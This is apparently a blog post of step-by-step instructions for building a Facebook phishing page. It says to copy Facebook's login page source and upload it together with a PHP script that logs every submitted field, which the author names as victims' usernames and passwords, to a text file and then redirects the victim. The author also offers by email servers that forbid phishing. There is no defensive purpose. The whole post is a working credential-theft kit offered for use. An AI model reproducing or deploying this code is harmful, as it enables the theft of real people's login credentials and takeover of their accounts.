Follow the below steps(Images at the end)
1. Right click on the Login Page of Facebook and click on 'View Page Source'
2. Copy the whole thing and save it in your PC. I'd suggest you to save it in Notepad rather than MS Word.
3. And save this code below separately.
<?php
header("Location: http://i45.tinypic.com/2n219xk.jpg");
$handle = fopen("login.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
In the above code, the link beside location is going to be the page after logging into the pishing site, and in the very next line, you can see 'login.txt', that is where the victims' usernames and passwords are saved. The server you use automatically creates the file if you forgot to create it or saves it in the existing file if you created the file. You can replace the 'login.txt' by any other name you wish.
4.Upload the above two files renaming the files as 'filename.txt.php' in any of the servers. The server that I use has clearly mentioned that they should not be used for Phishing. So, if you wish to know about those servers, mail me at steva4u@gmail.com. I'll send you the sites.
That's it you are done. Now, you own a phishing site..........!!! Have problem with this? Feel free to ask.I'll post a video if you wish to have one. Tags: Facebook
If you enjoyed this post and wish to be informed whenever a new post is published, then make sure you subscribe to my regular Email Updates. Subscribe Now!